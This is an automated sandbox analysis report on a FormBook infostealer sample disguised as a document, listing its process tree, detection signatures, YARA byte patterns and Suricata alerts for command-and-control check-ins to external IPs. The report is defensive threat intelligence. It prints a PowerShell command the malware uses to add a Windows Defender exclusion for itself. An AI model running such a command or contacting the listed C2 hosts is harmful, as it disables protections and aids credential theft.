Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PASU5160894680 DOCS.scr.exe

Overview

General Information

Sample name:PASU5160894680 DOCS.scr.exe
Analysis ID:1510085
MD5:6e3e35e593690a43c0fabe9ec9367b67
SHA1:8f9ed06b7b4d0d3c9b4f34ec66919482abacb7f4
SHA256:6cc54bd57057a1fc07c2726c351a42f47caef4ae05a2693fbf6b9f693c6761c6
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PASU5160894680 DOCS.scr.exe (PID: 7336 cmdline: "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe" MD5: 6E3E35E593690A43C0FABE9EC9367B67)
    • powershell.exe (PID: 7520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 7544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
      • uFLByAWAOFbhtV.exe (PID: 2496 cmdline: "C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • control.exe (PID: 7792 cmdline: "C:\Windows\SysWOW64\control.exe" MD5: EBC29AA32C57A54018089CFC9CACAFE8)
          • uFLByAWAOFbhtV.exe (PID: 5084 cmdline: "C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8128 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
PASU5160894680 DOCS.scr.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ed23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x16f62:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2bc30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x13e6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          Click to see the 10 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            4.2.vbc.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ed23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16f62:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            4.2.vbc.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.vbc.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
              • 0x2df23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0x16162:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
              0.0.PASU5160894680 DOCS.scr.exe.f00000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", ParentImage: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe, ParentProcessId: 7336, ParentProcessName: PASU5160894680 DOCS.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", ProcessId: 7520, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", ParentImage: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe, ParentProcessId: 7336, ParentProcessName: PASU5160894680 DOCS.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", ProcessId: 7520, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", ParentImage: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe, ParentProcessId: 7336, ParentProcessName: PASU5160894680 DOCS.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe", ProcessId: 7520, ProcessName: powershell.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-12T15:05:02.912694+020028554651A Network Trojan was detected192.168.2.4497903.33.130.19080TCP
                2024-09-12T15:05:31.657380+020028554651A Network Trojan was detected192.168.2.44974143.135.99.2180TCP
                2024-09-12T15:05:55.206008+020028554651A Network Trojan was detected192.168.2.44974579.125.89.8380TCP
                2024-09-12T15:06:09.188031+020028554651A Network Trojan was detected192.168.2.449750160.251.148.11580TCP
                2024-09-12T15:06:22.322097+020028554651A Network Trojan was detected192.168.2.4497543.33.130.19080TCP
                2024-09-12T15:06:36.197853+020028554651A Network Trojan was detected192.168.2.449758203.161.43.22880TCP
                2024-09-12T15:06:49.594348+020028554651A Network Trojan was detected192.168.2.4497623.33.130.19080TCP
                2024-09-12T15:07:02.761171+020028554651A Network Trojan was detected192.168.2.449766185.199.108.15380TCP
                2024-09-12T15:07:26.677164+020028554651A Network Trojan was detected192.168.2.44977091.184.0.20080TCP
                2024-09-12T15:07:40.502677+020028554651A Network Trojan was detected192.168.2.449774154.23.176.19780TCP
                2024-09-12T15:07:55.526268+020028554651A Network Trojan was detected192.168.2.44977845.113.201.7780TCP
                2024-09-12T15:08:08.786856+020028554651A Network Trojan was detected192.168.2.44978276.223.113.16180TCP
                2024-09-12T15:08:30.549061+020028554651A Network Trojan was detected192.168.2.44978684.32.84.3780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-12T15:05:47.701508+020028554641A Network Trojan was detected192.168.2.44974279.125.89.8380TCP
                2024-09-12T15:05:49.944323+020028554641A Network Trojan was detected192.168.2.44974379.125.89.8380TCP
                2024-09-12T15:05:52.578611+020028554641A Network Trojan was detected192.168.2.44974479.125.89.8380TCP
                2024-09-12T15:06:01.558052+020028554641A Network Trojan was detected192.168.2.449747160.251.148.11580TCP
                2024-09-12T15:06:04.084737+020028554641A Network Trojan was detected192.168.2.449748160.251.148.11580TCP
                2024-09-12T15:06:06.832873+020028554641A Network Trojan was detected192.168.2.449749160.251.148.11580TCP
                2024-09-12T15:06:14.682539+020028554641A Network Trojan was detected192.168.2.4497513.33.130.19080TCP
                2024-09-12T15:06:17.225496+020028554641A Network Trojan was detected192.168.2.4497523.33.130.19080TCP
                2024-09-12T15:06:19.790824+020028554641A Network Trojan was detected192.168.2.4497533.33.130.19080TCP
                2024-09-12T15:06:28.382906+020028554641A Network Trojan was detected192.168.2.449755203.161.43.22880TCP
                2024-09-12T15:06:30.954941+020028554641A Network Trojan was detected192.168.2.449756203.161.43.22880TCP
                2024-09-12T15:06:33.601631+020028554641A Network Trojan was detected192.168.2.449757203.161.43.22880TCP
                2024-09-12T15:06:43.007045+020028554641A Network Trojan was detected192.168.2.4497593.33.130.19080TCP
                2024-09-12T15:06:44.485859+020028554641A Network Trojan was detected192.168.2.4497603.33.130.19080TCP
                2024-09-12T15:06:47.036755+020028554641A Network Trojan was detected192.168.2.4497613.33.130.19080TCP
                2024-09-12T15:06:55.291039+020028554641A Network Trojan was detected192.168.2.449763185.199.108.15380TCP
                2024-09-12T15:06:57.638304+020028554641A Network Trojan was detected192.168.2.449764185.199.108.15380TCP
                2024-09-12T15:07:00.202554+020028554641A Network Trojan was detected192.168.2.449765185.199.108.15380TCP
                2024-09-12T15:07:18.984871+020028554641A Network Trojan was detected192.168.2.44976791.184.0.20080TCP
                2024-09-12T15:07:21.647591+020028554641A Network Trojan was detected192.168.2.44976891.184.0.20080TCP
                2024-09-12T15:07:24.253464+020028554641A Network Trojan was detected192.168.2.44976991.184.0.20080TCP
                2024-09-12T15:07:32.867699+020028554641A Network Trojan was detected192.168.2.449771154.23.176.19780TCP
                2024-09-12T15:07:35.362763+020028554641A Network Trojan was detected192.168.2.449772154.23.176.19780TCP
                2024-09-12T15:07:38.183068+020028554641A Network Trojan was detected192.168.2.449773154.23.176.19780TCP
                2024-09-12T15:07:47.152302+020028554641A Network Trojan was detected192.168.2.44977545.113.201.7780TCP
                2024-09-12T15:07:49.683729+020028554641A Network Trojan was detected192.168.2.44977645.113.201.7780TCP
                2024-09-12T15:07:52.206347+020028554641A Network Trojan was detected192.168.2.44977745.113.201.7780TCP
                2024-09-12T15:08:01.064027+020028554641A Network Trojan was detected192.168.2.44977976.223.113.16180TCP
                2024-09-12T15:08:03.599426+020028554641A Network Trojan was detected192.168.2.44978076.223.113.16180TCP
                2024-09-12T15:08:06.213488+020028554641A Network Trojan was detected192.168.2.44978176.223.113.16180TCP
                2024-09-12T15:08:22.883446+020028554641A Network Trojan was detected192.168.2.44978384.32.84.3780TCP
                2024-09-12T15:08:25.443626+020028554641A Network Trojan was detected192.168.2.44978484.32.84.3780TCP
                2024-09-12T15:08:27.981899+020028554641A Network Trojan was detected192.168.2.44978584.32.84.3780TCP
                2024-09-12T15:08:36.171879+020028554641A Network Trojan was detected192.168.2.4497873.33.130.19080TCP
                2024-09-12T15:08:38.741159+020028554641A Network Trojan was detected192.168.2.4497883.33.130.19080TCP
                2024-09-12T15:08:42.214171+020028554641A Network Trojan was detected192.168.2.4497893.33.130.19080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: PASU5160894680 DOCS.scr.exeAvira: detected
                Multi AV Scanner detection for submitted file
                Source: PASU5160894680 DOCS.scr.exeReversingLabs: Detection: 31%
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4133252340.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1846811096.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1848370775.0000000006CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: PASU5160894680 DOCS.scr.exeJoe Sandbox ML: detected
                Source: PASU5160894680 DOCS.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PASU5160894680 DOCS.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: control.exe, 00000006.00000002.4134255300.000000000541C000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000006.00000002.4133923961.0000000004EB7000.00000004.00000020.00020000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000000.1915538876.000000000344C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2136958626.00000000089CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uFLByAWAOFbhtV.exe, 00000005.00000000.1766652300.0000000000BDE000.00000002.00000001.01000000.0000000C.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4132210801.0000000000BDE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: control.pdb source: vbc.exe, 00000004.00000002.1846972436.0000000005148000.00000004.00000020.00020000.00000000.sdmp, uFLByAWAOFbhtV.exe, 00000005.00000002.4132695833.0000000000728000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.1849604630.00000000049AD000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.1847230408.00000000047F3000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000006.00000003.1849604630.00000000049AD000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.1847230408.00000000047F3000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: vbc.pdb source: control.exe, 00000006.00000002.4134255300.000000000541C000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000006.00000002.4133923961.0000000004EB7000.00000004.00000020.00020000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000000.1915538876.000000000344C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2136958626.00000000089CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: control.pdbUGP source: vbc.exe, 00000004.00000002.1846972436.0000000005148000.00000004.00000020.00020000.00000000.sdmp, uFLByAWAOFbhtV.exe, 00000005.00000002.4132695833.0000000000728000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C6C1D0 FindFirstFileW,FindNextFileW,FindClose,6_2_00C6C1D0
                Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then xor eax, eax6_2_00C59A60
                Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi6_2_00C5DE30
                Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then mov ebx, 00000004h6_2_04A604DE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 43.135.99.21:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 79.125.89.83:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 160.251.148.115:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49749 -> 160.251.148.115:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 79.125.89.83:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49781 -> 76.223.113.161:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49784 -> 84.32.84.37:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49750 -> 160.251.148.115:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49745 -> 79.125.89.83:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49766 -> 185.199.108.153:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49782 -> 76.223.113.161:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49754 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49776 -> 45.113.201.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49769 -> 91.184.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 91.184.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 160.251.148.115:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49786 -> 84.32.84.37:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 154.23.176.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 185.199.108.153:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 45.113.201.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 91.184.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49780 -> 76.223.113.161:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49757 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49753 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 185.199.108.153:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 79.125.89.83:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49783 -> 84.32.84.37:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49787 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 154.23.176.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49765 -> 185.199.108.153:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49778 -> 45.113.201.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49762 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49758 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49789 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49770 -> 91.184.0.200:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49774 -> 154.23.176.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49785 -> 84.32.84.37:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49788 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49761 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49773 -> 154.23.176.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49777 -> 45.113.201.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49779 -> 76.223.113.161:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49790 -> 3.33.130.190:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.academy-training.xyz
                Yara detected Generic Downloader
                Source: Yara matchFile source: PASU5160894680 DOCS.scr.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.PASU5160894680 DOCS.scr.exe.f00000.0.unpack, type: UNPACKEDPE
                Source: Joe Sandbox ViewIP Address: 203.161.43.228 203.161.43.228
                Source: Joe Sandbox ViewIP Address: 160.251.148.115 160.251.148.115
